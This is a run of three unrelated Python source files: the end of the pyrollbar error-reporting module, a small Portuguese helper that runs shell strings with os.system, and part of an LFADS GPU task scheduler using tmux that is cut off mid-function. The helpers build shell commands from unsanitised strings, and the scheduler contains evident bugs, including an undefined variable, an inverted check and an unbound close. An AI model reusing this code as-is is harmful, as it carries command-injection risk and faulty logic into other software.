return _get_api('search/',
title=title,
fields=return_fields,
access_token=access_token,
endpoint=endpoint,
**search_fields)
def wait(f=None):
_threads.join()
if f is not None:
return f()
class ApiException(Exception):
"""
This exception will be raised if there was a problem decoding the
response from an API call.
"""
pass
class ApiError(ApiException):
"""
This exception will be raised if the API response contains an 'err'
field, denoting there was a problem fulfilling the api request.
"""
pass
class Result(object):
"""
This class encapsulates the response from an API call.
Usage:
result = search_items(title='foo', fields=['id'])
print result.data
"""
def __init__(self, access_token, path, params, data):
self.access_token = access_token
self.path = path
self.params = params
self.data = data
def __str__(self):
return str(self.data)
class PagedResult(Result):
"""
This class wraps the response from an API call that responded with
a page of results.
Usage:
result = search_items(title='foo', fields=['id'])
print 'First page: %d, data: %s' % (result.page, result.data)
result = result.next_page()
print 'Second page: %d, data: %s' % (result.page, result.data)
"""
def __init__(self, access_token, path, page_num, params, data, endpoint=None):
super(PagedResult, self).__init__(access_token, path, params, data)
self.page = page_num
self.endpoint = endpoint
def next_page(self):
params = copy.copy(self.params)
params['page'] = self.page + 1
return _get_api(self.path, endpoint=self.endpoint, **params)
def prev_page(self):
if self.page <= 1:
return self
params = copy.copy(self.params)
params['page'] = self.page - 1
return _get_api(self.path, endpoint=self.endpoint, **params)
## internal functions
def _resolve_exception_class(idx, filter):
cls, level = filter
if isinstance(cls, six.string_types):
# Lazily resolve class name
parts = cls.split('.')
module = '.'.join(parts[:-1])
if module in sys.modules and hasattr(sys.modules[module], parts[-1]):
cls = getattr(sys.modules[module], parts[-1])
SETTINGS['exception_level_filters'][idx] = (cls, level)
else:
cls = None
return cls, level
def _filtered_level(exception):
for i, filter in enumerate(SETTINGS['exception_level_filters']):
cls, level = _resolve_exception_class(i, filter)
if cls and isinstance(exception, cls):
return level
return None
def _is_ignored(exception):
return _filtered_level(exception) == 'ignored'
def _create_agent_log():
"""
Creates .rollbar log file for use with rollbar-agent
"""
log_file = SETTINGS['agent.log_file']
if not log_file.endswith('.rollbar'):
log.error("Provided agent log file does not end with .rollbar, which it must. "
"Using default instead.")
log_file = DEFAULTS['agent.log_file']
retval = logging.getLogger('rollbar_agent')
handler = logging.FileHandler(log_file, 'a', 'utf-8')
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
retval.addHandler(handler)
retval.setLevel(logging.WARNING)
return retval
def _report_exc_info(exc_info, request, extra_data, payload_data, level=None):
"""
Called by report_exc_info() wrapper
"""
if not _check_config():
return
filtered_level = _filtered_level(exc_info[1])
if level is None:
level = filtered_level
filtered_exc_info = events.on_exception_info(exc_info,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_exc_info is False:
return
cls, exc, trace = filtered_exc_info
data = _build_base_data(request)
if level is not None:
data['level'] = level
# walk the trace chain to collect cause and context exceptions
trace_chain = _walk_trace_chain(cls, exc, trace)
extra_trace_data = None
if len(trace_chain) > 1:
data['body'] = {
'trace_chain': trace_chain
}
if payload_data and ('body' in payload_data) and ('trace' in payload_data['body']):
extra_trace_data = payload_data['body']['trace']
del payload_data['body']['trace']
else:
data['body'] = {
'trace': trace_chain[0]
}
if extra_data:
extra_data = extra_data
if not isinstance(extra_data, dict):
extra_data = {'value': extra_data}
if extra_trace_data:
extra_data = dict_merge(extra_data, extra_trace_data)
data['custom'] = extra_data
if extra_trace_data and not extra_data:
data['custom'] = extra_trace_data
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, data.get('access_token'))
return data['uuid']
def _walk_trace_chain(cls, exc, trace):
trace_chain = [_trace_data(cls, exc, trace)]
while True:
exc = getattr(exc, '__cause__', None) or getattr(exc, '__context__', None)
if not exc:
break
trace_chain.append(_trace_data(type(exc), exc, getattr(exc, '__traceback__', None)))
return trace_chain
def _trace_data(cls, exc, trace):
# exception info
# most recent call last
raw_frames = traceback.extract_tb(trace)
frames = [{'filename': f[0], 'lineno': f[1], 'method': f[2], 'code': f[3]} for f in raw_frames]
trace_data = {
'frames': frames,
'exception': {
'class': getattr(cls, '__name__', cls.__class__.__name__),
'message': text(exc),
}
}
_add_locals_data(trace_data, (cls, exc, trace))
return trace_data
def _report_message(message, level, request, extra_data, payload_data):
"""
Called by report_message() wrapper
"""
if not _check_config():
return
filtered_message = events.on_message(message,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_message is False:
return
data = _build_base_data(request, level=level)
# message
data['body'] = {
'message': {
'body': filtered_message
}
}
if extra_data:
extra_data = extra_data
data['body']['message'].update(extra_data)
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, data.get('access_token'))
return data['uuid']
def _check_config():
if not SETTINGS.get('enabled'):
log.info("pyrollbar: Not reporting because rollbar is disabled.")
return False
# skip access token check for the agent handler
if SETTINGS.get('handler') == 'agent':
return True
# make sure we have an access_token
if not SETTINGS.get('access_token'):
log.warning("pyrollbar: No access_token provided. Please configure by calling rollbar.init() with your access token.")
return False
return True
def _build_base_data(request, level='error'):
data = {
'timestamp': int(time.time()),
'environment': SETTINGS['environment'],
'level': level,
'language': 'python %s' % '.'.join(str(x) for x in sys.version_info[:3]),
'notifier': SETTINGS['notifier'],
'uuid': text(uuid.uuid4()),
}
if SETTINGS.get('code_version'):
data['code_version'] = SETTINGS['code_version']
if BASE_DATA_HOOK:
BASE_DATA_HOOK(request, data)
return data
def _add_person_data(data, request):
try:
person_data = _build_person_data(request)
except Exception as e:
log.exception("Exception while building person data for Rollbar payload: %r", e)
else:
if person_data:
if not SETTINGS['capture_username'] and 'username' in person_data:
person_data['username'] = None
if not SETTINGS['capture_email'] and 'email' in person_data:
person_data['email'] = None
data['person'] = person_data
def _build_person_data(request):
"""
Returns a dictionary describing the logged-in user using data from `request.
Try request.rollbar_person first, then 'user', then 'user_id'
"""
if hasattr(request, 'rollbar_person'):
rollbar_person_prop = request.rollbar_person
try:
person = rollbar_person_prop()
except TypeError:
person = rollbar_person_prop
if person and isinstance(person, dict):
return person
else:
return None
if hasattr(request, 'user'):
user_prop = request.user
try:
user = user_prop()
except TypeError:
user = user_prop
if not user:
return None
elif isinstance(user, dict):
return user
else:
retval = {}
if getattr(user, 'id', None):
retval['id'] = text(user.id)
elif getattr(user, 'user_id', None):
retval['id'] = text(user.user_id)
# id is required, so only include username/email if we have an id
if retval.get('id'):
username = getattr(user, 'username', None)
email = getattr(user, 'email', None)
retval.update({
'username': username,
'email': email
})
return retval
if hasattr(request, 'user_id'):
user_id_prop = request.user_id
try:
user_id = user_id_prop()
except TypeError:
user_id = user_id_prop
if not user_id:
return None
return {'id': text(user_id)}
def _get_func_from_frame(frame):
func_name = inspect.getframeinfo(frame).function
caller = frame.f_back
if caller:
func = caller.f_locals.get(func_name,
caller.f_globals.get(func_name))
else:
func = None
return func
def _flatten_nested_lists(l):
ret = []
for x in l:
if isinstance(x, list):
ret.extend(_flatten_nested_lists(x))
else:
ret.append(x)
return ret
def _add_locals_data(trace_data, exc_info):
if not SETTINGS['locals']['enabled']:
return
frames = trace_data['frames']
cur_tb = exc_info[2]
frame_num = 0
num_frames = len(frames)
while cur_tb:
cur_frame = frames[frame_num]
tb_frame = cur_tb.tb_frame
cur_tb = cur_tb.tb_next
if not isinstance(tb_frame, types.FrameType):
# this can happen if the traceback or frame is wrapped in some way,
# for example by `ExceptionInfo` in
# https://github.com/celery/billiard/blob/master/billiard/einfo.py
log.warning('Traceback frame not a types.FrameType. Ignoring.')
frame_num += 1
continue
# Create placeholders for argspec/varargspec/keywordspec/locals
argspec = None
varargspec = None
keywordspec = None
_locals = {}
try:
arginfo = inspect.getargvalues(tb_frame)
# Optionally fill in locals for this frame
if arginfo.locals and _check_add_locals(cur_frame, frame_num, num_frames):
# Get all of the named args
#
# args can be a nested list of args in the case where there
# are anonymous tuple args provided.
# e.g. in Python 2 you can:
# def func((x, (a, b), z)):
# return x + a + b + z
#
# func((1, (1, 2), 3))
argspec = _flatten_nested_lists(arginfo.args)
if arginfo.varargs is not None:
varargspec = arginfo.varargs
if SETTINGS['locals']['scrub_varargs']:
temp_varargs = list(arginfo.locals[varargspec])
for i, arg in enumerate(temp_varargs):
temp_varargs[i] = REDACT_REF
arginfo.locals[varargspec] = tuple(temp_varargs)
if arginfo.keywords is not None:
keywordspec = arginfo.keywords
_locals.update(arginfo.locals.items())
except Exception:
log.exception('Error while extracting arguments from frame. Ignoring.')
# Finally, serialize each arg/kwarg/local separately so that we only report
# CircularReferences for each variable, instead of for the entire payload
# as would be the case if we serialized that payload in one-shot.
if argspec:
cur_frame['argspec'] = argspec
if varargspec:
cur_frame['varargspec'] = varargspec
if keywordspec:
cur_frame['keywordspec'] = keywordspec
if _locals:
try:
cur_frame['locals'] = dict((k, _serialize_frame_data(v)) for k, v in iteritems(_locals))
except Exception:
log.exception('Error while serializing frame data.')
frame_num += 1
def _serialize_frame_data(data):
for transform in (ScrubRedactTransform(), _serialize_transform):
data = transforms.transform(data, transform)
return data
def _add_lambda_context_data(data):
"""
Attempts to add information from the lambda context if it exists
"""
global _CURRENT_LAMBDA_CONTEXT
context = _CURRENT_LAMBDA_CONTEXT
if context is None:
return
try:
lambda_data = {
'lambda': {
'remaining_time_in_millis': context.get_remaining_time_in_millis(),
'function_name': context.function_name,
'function_version': context.function_version,
'arn': context.invoked_function_arn,
'request_id': context.aws_request_id,
}
}
if 'custom' in data:
data['custom'] = dict_merge(data['custom'], lambda_data)
else:
data['custom'] = lambda_data
except Exception as e:
log.exception("Exception while adding lambda context data: %r", e)
finally:
_CURRENT_LAMBDA_CONTEXT = None
def _add_request_data(data, request):
"""
Attempts to build request data; if successful, sets the 'request' key on `data`.
"""
try:
request_data = _build_request_data(request)
except Exception as e:
log.exception("Exception while building request_data for Rollbar payload: %r", e)
else:
if request_data:
_filter_ip(request_data, SETTINGS['capture_ip'])
data['request'] = request_data
def _check_add_locals(frame, frame_num, total_frames):
"""
Returns True if we should record local variables for the given frame.
"""
# Include the last frames locals
# Include any frame locals that came from a file in the project's root
return any(((frame_num == total_frames - 1),
('root' in SETTINGS and (frame.get('filename') or '').lower().startswith((SETTINGS['root'] or '').lower()))))
def _get_actual_request(request):
if WerkzeugLocalProxy and isinstance(request, WerkzeugLocalProxy):
try:
actual_request = request._get_current_object()
except RuntimeError:
return None
return actual_request
return request
def _build_request_data(request):
"""
Returns a dictionary containing data from the request.
Can handle webob or werkzeug-based request objects.
"""
# webob (pyramid)
if WebobBaseRequest and isinstance(request, WebobBaseRequest):
return _build_webob_request_data(request)
# django
if DjangoHttpRequest and isinstance(request, DjangoHttpRequest):
return _build_django_request_data(request)
# django rest framework
if RestFrameworkRequest and isinstance(request, RestFrameworkRequest):
return _build_django_request_data(request)
# werkzeug (flask)
if WerkzeugRequest and isinstance(request, WerkzeugRequest):
return _build_werkzeug_request_data(request)
# tornado
if TornadoRequest and isinstance(request, TornadoRequest):
return _build_tornado_request_data(request)
# bottle
if BottleRequest and isinstance(request, BottleRequest):
return _build_bottle_request_data(request)
# Sanic
if SanicRequest and isinstance(request, SanicRequest):
return _build_sanic_request_data(request)
# falcon
if FalconRequest and isinstance(request, FalconRequest):
return _build_falcon_request_data(request)
# Plain wsgi (should be last)
if isinstance(request, dict) and 'wsgi.version' in request:
return _build_wsgi_request_data(request)
return None
def _build_webob_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.GET),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
}
try:
if request.json:
request_data['json'] = request.json
except:
pass
# pyramid matchdict
if getattr(request, 'matchdict', None):
request_data['params'] = request.matchdict
# workaround for webob bug when the request body contains binary data but has a text
# content-type
try:
request_data['POST'] = dict(request.POST)
except UnicodeDecodeError:
request_data['body'] = request.body
return request_data
def _extract_wsgi_headers(items):
headers = {}
for k, v in items:
if k.startswith('HTTP_'):
header_name = '-'.join(k[len('HTTP_'):].replace('_', ' ').title().split(' '))
headers[header_name] = v
return headers
def _build_django_request_data(request):
request_data = {
'url': request.build_absolute_uri(),
'method': request.method,
'GET': dict(request.GET),
'POST': dict(request.POST),
'user_ip': _wsgi_extract_user_ip(request.META),
}
request_data['headers'] = _extract_wsgi_headers(request.META.items())
return request_data
def _build_werkzeug_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.args),
'POST': dict(request.form),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
'files_keys': list(request.files.keys()),
}
try:
if request.json:
request_data['body'] = request.json
except Exception:
pass
return request_data
def _build_tornado_request_data(request):
request_data = {
'url': request.full_url(),
'user_ip': request.remote_ip,
'headers': dict(request.headers),
'method': request.method,
'files_keys': request.files.keys(),
'start_time': getattr(request, '_start_time', None),
}
request_data[request.method] = request.arguments
return request_data
def _build_bottle_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.query)
}
if request.json:
try:
request_data['body'] = request.body.getvalue()
except:
pass
else:
request_data['POST'] = dict(request.forms)
return request_data
def _build_sanic_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': request.headers,
'method': request.method,
'GET': dict(request.args)
}
if request.json:
try:
request_data['body'] = request.json
except:
pass
else:
request_data['POST'] = request.form
return request_data
def _build_falcon_request_data(request):
request_data = {
'url': request.url,
'user_ip': _wsgi_extract_user_ip(request.env),
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.params),
'context': dict(request.context),
}
return request_data
def _build_wsgi_request_data(request):
request_data = {
'url': wsgiref.util.request_uri(request),
'user_ip': _wsgi_extract_user_ip(request),
'method': request.get('REQUEST_METHOD'),
}
if 'QUERY_STRING' in request:
request_data['GET'] = parse_qs(request['QUERY_STRING'], keep_blank_values=True)
# Collapse single item arrays
request_data['GET'] = dict((k, v[0] if len(v) == 1 else v) for k, v in request_data['GET'].items())
request_data['headers'] = _extract_wsgi_headers(request.items())
try:
length = int(request.get('CONTENT_LENGTH', 0))
except ValueError:
length = 0
input = request.get('wsgi.input')
if length and input and hasattr(input, 'seek') and hasattr(input, 'tell'):
pos = input.tell()
input.seek(0, 0)
request_data['body'] = input.read(length)
input.seek(pos, 0)
return request_data
def _filter_ip(request_data, capture_ip):
if 'user_ip' not in request_data or capture_ip == True:
return
current_ip = request_data['user_ip']
if not current_ip:
return
new_ip = current_ip
if not capture_ip:
new_ip = None
elif capture_ip == ANONYMIZE:
try:
if '.' in current_ip:
new_ip = '.'.join(current_ip.split('.')[0:3]) + '.0'
elif ':' in current_ip:
parts = current_ip.split(':')
if len(parts) > 2:
terminal = '0000:0000:0000:0000:0000'
new_ip = ':'.join(parts[0:3] + [terminal])
else:
new_ip = None
except:
new_ip = None
request_data['user_ip'] = new_ip
def _build_server_data():
"""
Returns a dictionary containing information about the server environment.
"""
# server environment
server_data = {
'host': socket.gethostname(),
'pid': os.getpid()
}
# argv does not always exist in embedded python environments
argv = getattr(sys, 'argv', None)
if argv:
server_data['argv'] = argv
for key in ['branch', 'root']:
if SETTINGS.get(key):
server_data[key] = SETTINGS[key]
return server_data
def _transform(obj, key=None):
for transform in _transforms:
obj = transforms.transform(obj, transform, key=key)
return obj
def _build_payload(data):
"""
Returns the full payload as a string.
"""
for k, v in iteritems(data):
data[k] = _transform(v, key=(k,))
payload = {
'access_token': SETTINGS['access_token'],
'data': data
}
return payload
def _serialize_payload(payload):
return json.dumps(payload)
def _send_payload(payload_str, access_token):
try:
_post_api('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
try:
_threads.get_nowait()
_threads.task_done()
except queue.Empty:
pass
def _send_payload_appengine(payload_str, access_token):
try:
_post_api_appengine('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_appengine(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = AppEngineFetch(url,
method="POST",
payload=payload_str,
headers=headers,
allow_truncated=False,
deadline=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
validate_certificate=SETTINGS.get('verify_https', True))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _post_api(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = transport.post(url,
data=payload_str,
headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _get_api(path, access_token=None, endpoint=None, **params):
access_token = access_token or SETTINGS['access_token']
url = urljoin(endpoint or SETTINGS['endpoint'], path)
params['access_token'] = access_token
resp = transport.get(url,
params=params,
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, access_token, params, resp, endpoint=endpoint)
def _send_payload_tornado(payload_str, access_token):
try:
_post_api_tornado('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_tornado(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
else:
access_token = SETTINGS['access_token']
url = urljoin(SETTINGS['endpoint'], path)
def post_tornado_cb(resp):
r = requests.Response()
r._content = resp.body
r.status_code = resp.code
r.headers.update(resp.headers)
try:
_parse_response(path, access_token, payload_str, r)
except Exception as e:
log.exception('Exception while posting item %r', e)
TornadoAsyncHTTPClient().fetch(url,
callback=post_tornado_cb,
raise_error=False,
body=payload_str,
method='POST',
connect_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
request_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
def _send_payload_twisted(payload_str, access_token):
try:
_post_api_twisted('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_twisted(path, payload_str, access_token=None):
def post_data_cb(data, resp):
resp._content = data
_parse_response(path, SETTINGS['access_token'], payload_str, resp)
def post_cb(resp):
r = requests.Response()
r.status_code = resp.code
r.headers.update(resp.headers.getAllRawHeaders())
return treq.content(resp).addCallback(post_data_cb, r)
headers = {'Content-Type': ['application/json']}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = [access_token]
url = urljoin(SETTINGS['endpoint'], path)
d = treq.post(url, payload_str, headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
d.addCallback(post_cb)
def _send_failsafe(message, uuid, host):
body_message = ('Failsafe from pyrollbar: {0}. Original payload may be found '
'in your server logs by searching for the UUID.').format(message)
data = {
'level': 'error',
'environment': SETTINGS['environment'],
'body': {
'message': {
'body': body_message
}
},
'notifier': SETTINGS['notifier'],
'custom': {
'orig_uuid': uuid,
'orig_host': host
},
'failsafe': True,
'internal': True,
}
payload = _build_payload(data)
try:
send_payload(payload, SETTINGS['access_token'])
except Exception:
log.exception('Rollbar: Error sending failsafe.')
def _parse_response(path, access_token, params, resp, endpoint=None):
if isinstance(resp, requests.Response):
try:
data = resp.text
except Exception:
data = resp.content
log.error('resp.text is undefined, resp.content is %r', resp.content)
else:
data = resp.content
global _LAST_RESPONSE_STATUS
last_response_was_429 = _LAST_RESPONSE_STATUS == 429
_LAST_RESPONSE_STATUS = resp.status_code
if resp.status_code == 429:
if SETTINGS['log_all_rate_limited_items'] or not last_response_was_429:
log.warning("Rollbar: over rate limit, data was dropped. Payload was: %r", params)
return
elif resp.status_code == 502:
log.exception('Rollbar api returned a 502')
return
elif resp.status_code == 413:
uuid = None
host = None
try:
payload = json.loads(params)
uuid = payload['data']['uuid']
host = payload['data']['server']['host']
log.error("Rollbar: request entity too large for UUID %r\n. Payload:\n%r", uuid, payload)
except (TypeError, ValueError):
log.exception('Unable to decode JSON for failsafe.')
except KeyError:
log.exception('Unable to find payload parameters for failsafe.')
_send_failsafe('payload too large', uuid, host)
# TODO: Should we return here?
elif resp.status_code != 200:
log.warning("Got unexpected status code from Rollbar api: %s\nResponse:\n%s",
resp.status_code, data)
# TODO: Should we also return here?
try:
json_data = json.loads(data)
except (TypeError, ValueError):
log.exception('Could not decode Rollbar api response:\n%s', data)
raise ApiException('Request to %s returned invalid JSON response', path)
else:
if json_data.get('err'):
raise ApiError(json_data.get('message') or 'Unknown error')
result = json_data.get('result', {})
if 'page' in result:
return PagedResult(access_token, path, result['page'], params, result, endpoint=endpoint)
else:
return Result(access_token, path, params, result)
def _extract_user_ip(request):
# some common things passed by load balancers... will need more of these.
real_ip = request.headers.get('X-Real-Ip')
if real_ip:
return real_ip
forwarded_for = request.headers.get('X-Forwarded-For')
if forwarded_for:
return forwarded_for
return request.remote_addr
def _wsgi_extract_user_ip(environ):
forwarded_for = environ.get('HTTP_X_FORWARDED_FOR')
if forwarded_for:
return forwarded_for
real_ip = environ.get('HTTP_X_REAL_IP')
if real_ip:
return real_ip
return environ['REMOTE_ADDR']
|
executar.py
|
from threading import Thread
from os import system
def executar_rp(exe: str):
'''Função que executa um aplicativo externo
Parameters:
exe (str): String com aplicativo e parâmetros
'''
try:
system(exe)
except Exception as er:
print('executar_rp:')
print(er)
def outraRota(funcao, *args: tuple):
'''Função que executa um aplicativo em paralelo (Thread)
Parameters:
args (tuple): Múltiplos parâmetros
(arg1, arg2, arg3...)
'''
try:
t = Thread(target = funcao, args = args)
t.daemon = True
t.start()
except Exception as er:
print('outraRota:')
print(er)
def executar(exe: str):
'''Função que executa um aplicativo externo em paralelo
Parameters:
exe (str): String com aplicativo e parâmetros
'''
try:
outraRota(executar_rp, exe)
except Exception as er:
print('executar:')
print(er)
|
lfadsqueue.py
|
# Goals
# -----
#
# What we want is to launch and monitor multiple shell scripts simultaneously.
# We have a list of tasks. Each task has a certain amount of memory that it needs in GPU memory.
#
# Launch tensorboard with all runs queued.
#
# At the start, we loop through the queue and determine if the next task can run on any GPU. If so, we launch it on that GPU. On each tick (1 second), we perform this basic operation where we launch the first item in the queue that can be run on a GPU. Print a message when a new process is launched on which GPU.
#
# While this is happening, monitor each of the output processes that are in play and dump output with appropriate identifying queues.
import subprocess
import os
import csv
import re
import numpy as np
import time
import shlex
from multiprocessing import Process, Queue, cpu_count, Lock
try:
from queue import Empty
except ImportError:
from Queue import Empty
import sys, traceback
import errno
# needed for synchronization to ensure tmux isn't called by multiple processes simultaneously
mutex = Lock()
class GpuStatus(object):
def __init__(self, index, name, memfree, memtotal, uuid, num_tasks=0):
self.index = index
self.name = name
self.memfree = memfree
self.memtotal = memtotal
self.uuid = uuid
self.num_tasks = num_tasks
def __repr__(self):
return 'GpuStatus {}:"{}" free {}/{} MiB, {} tasks'.format(self.index, self.name, self.memfree, self.memtotal, self.num_tasks)
def incr_num_tasks(self):
self.num_tasks += 1
def decr_num_tasks(self):
if self.num_tasks > 0:
self.num_tasks -= 1
class Task(object):
index = None
name = ''
command = '' # shell command
outfile = None # output from stdout and stderr
donefile = None # created when task completed
memory_req = 0 # memory needed on GPU
running_on_gpu = None # which GPU index running on
has_finished = False
has_failed = False
skipped_donefile_exists = False
process = None
popen = None
def is_running(self):
return self.running_on_gpu is not None and not self.has_finished
def __init__(self, index, name='', command='', memory_req=0,
outfile=None, donefile=None, tmux_session=None):
self.index = index
self.name = name
self.command = command
self.memory_req = memory_req
self.outfile = outfile
self.donefile = donefile
if tmux_session is None:
self.tmux_session = tmux_session
def __repr__(self):
if self.has_finished:
if self.skipped_donefile_exists:
status = 'skipped, donefile exists'
else:
status = 'finished'
elif self.is_running():
status = 'running on GPU {}'.format(self.running_on_gpu)
else:
status = 'not running'
return 'Task {} {}: mem req {}, {}'.format(self.index, self.name, self.memory_req, status)
def mark_finished_if_donefile_exists(self):
if self.donefile:
if os.path.exists(self.donefile):
self.has_finished = True
self.skipped_donefile_exists = True
def delete_donefile(self):
if self.donefile and os.path.exists(donefile):
os.remove(self.donefile)
def query_gpu_status():
"""
Calls nvidia_smi to poll GPU free memory
Returns:
gpu_status (list of dicts) : fields memfree (MiB), memtotal (MiB), name
"""
nvidia_out = str(subprocess.check_output(['nvidia-smi',
'--query-gpu=name,memory.free,memory.total,gpu_uuid',
'--format=csv,noheader,nounits']))
nvidia_with_header = "name,memfree,memtotal,uuid\n" + nvidia_out
# parse output of nvidia-smi query
reader = csv.DictReader(nvidia_with_header.splitlines())
gpu_status = []
for idx, info in enumerate(reader):
gpu_status.append(GpuStatus(index=idx, name=info['name'].strip(),
memfree=float(info['memfree']),
memtotal=float(info['memtotal']),
uuid=info['uuid'].strip()))
# now figure out how many python processes are running on each gpu
nvidia_out = str(subprocess.check_output(['nvidia-smi',
'--query-compute-apps=process_name,gpu_uuid',
'--format=csv,noheader,nounits']))
nvidia_with_header = "pname,uuid\n" + nvidia_out
# parse output of nvidia-smi query
reader = csv.DictReader(nvidia_with_header.splitlines())
# increment num tasks on python tasks by matching up GPU uuids
for task in reader:
if task['pname'] == 'python':
task_gpu_uuid = task['uuid'].strip()
[s.incr_num_tasks() for s in gpu_status if s.uuid == task_gpu_uuid]
return gpu_status
def find_gpu_ready_for_task(gpu_status, task):
"""
Returns the index of thegpu in gpu_status with memfree >= memory_req
with the fewest running tasks
Args:
gpu_status (list of GpuStatus)
task (list of Task)
Returns:
gpu.index (int)
"""
# of the set of GPUs with sufficient memory
gpu_eligible = [gpu for gpu in gpu_status if gpu.memfree >= task.memory_req]
if not gpu_eligible:
return None
# and the fewest running tasks. This also ensures that every GPU will be
# used at least once before tasks are doubled up
gpu = sorted(gpu_eligible, key = lambda gpu: gpu.num_tasks)[0]
return gpu.index
def find_gpu_by_index(gpu_list, index):
return [gpu for gpu in gpu_list if gpu.index == index][0]
def pick_next_task(gpu_status, tasks):
"""
Returns the index of the next task that isn't yet running and for which
there is a GPU that can run it
Args:
gpu_status : info about gpu memory usage
tasks (list of Tasks) : list of tasks to consider
Returns:
task_index
gpu_index
"""
for task_index, task in enumerate(tasks):
if not task.has_finished and not task.is_running():
gpu_index = find_gpu_ready_for_task(gpu_status, task)
if gpu_index is not None:
return (task_index, gpu_index)
return (None, None)
def check_all_tasks_completed_or_running(tasks):
return all([task.has_finished or task.is_running() for task in tasks])
def check_num_tasks_running(tasks):
return sum([1 if task.is_running() else 0 for task in tasks])
def check_all_tasks_complete(tasks):
return all([task.has_finished for task in tasks])
def build_task_list(task_specs):
return [Task(index=idx, **spec) for (idx, spec) in enumerate(task_specs)]
def generate_tmux_command(name, command):
"""
Generates a tmux command that will run command in tmux session name
and wait for it to complete before returning. The bash trap ensures that the
popen subprocess will complete even if the command in tmux is Ctrl-C'ed
"""
# return "tmux new-session -ds {name} 'trap \"tmux wait-for -S {name}_done\" SIGHUP SIGTERM SIGINT; {command}; tmux wait-for -S {name}_done' && tmux wait-for {name}_done".format(name=name, command=command)
return "tmux new-session -ds {name} 'export PATH={path}; {command}'".format(path=os.environ['PATH'], name=name, command=command)
def generate_tee_command(command, outfile, append=True):
"""Appends tee redirection for stdout and stderr to a command.
Command may be a list of strings, in which case each subcommand will be tee'd
and the set will be joined by semicolons"""
if append:
tee = 'tee -a'
else:
tee = 'tee'
if type(command) is str:
return '{} 2>&1 | {} {}'.format(command, tee, outfile)
else:
commands = ['{} 2>&1 | {} {}'.format(cmd, tee, outfile) for cmd in command]
return '; '.join(commands)
def follow_file(file):
"""Generator that reads lines appended to the end of a file"""
file.seek(0,2) # begin yielding at end of file in case we're using tee -a
while True:
line = file.readline()
if not line:
yield '' # need to yield '' so we don't close the generator
else:
yield line
def get_tail_file(filepath, nlines=3):
return str(subprocess.check_output(shlex.split('tail -n {} {}'.format(nlines, filepath))))
def touch_file(outfile):
# mkdir -p
if not os.path.exists(os.path.dirname(outfile)):
try:
os.makedirs(os.path.dirname(outfile))
except OSError as exc: # Guard against drace condition
if exc.errno != errno.EEXIST:
raise
# touch outfile to ensure it exists
try:
temp = open(outfile, 'a')
except IOError as exc:
print(('Error opening out file: {}'.format(exc)))
temp.close()
def get_list_tmux_sessions():
with mutex:
return str(subprocess.check_output(shlex.split("tmux list-sessions -F '#{session_name}'")).splitlines())
def check_tmux_session_exists(session):
return session in get_list_tmux_sessions()
def get_list_tmux_sessions_name_starts_with(prefix):
return [sess for sess in get_list_tmux_sessions() if sess.startswith(prefix)]
class TaskCompletedMessage(object):
def __init__(self, task_index, success, tail):
self.task_index = task_index
self.success = success
self.tail = tail
class TaskStartedMessage(object):
def __init__(self, task_index, pid, tmux_session):
self.task_index = task_index
self.pid = pid
self.tmux_session = tmux_session
class TaskExceptionMessage(object):
def __init__(self, task_index):
self.task_index = task_index
T, V, TB = sys.exc_info()
self.message = ''.join(traceback.format_exception(T,V,TB))
class ChildProcessError(Exception) :
pass
def process_launch_task_in_tmux(queue, task, gpu_index, filter_output=True):
"""Run command in tmux and monitor output"""
def print_task(x):
print(('Task {}: {}'.format(task.name, x.rstrip('\n').strip())))
def print_relevant_output_return_success_status(outlines):
"""Prints out relevant lines of output (LFADS specific)
and return True if the graceful exit line is printed"""
task_success = False
line = next(outlines)
while line is not None and line != '':
## These strings are LFADS specific
if "Stopping optimization" in line:
# LFADS trained successfully
task_success = True
print_task(line)
# determine whether to print output
elif not filter_output or "learning rate" in line:
print_task(line)
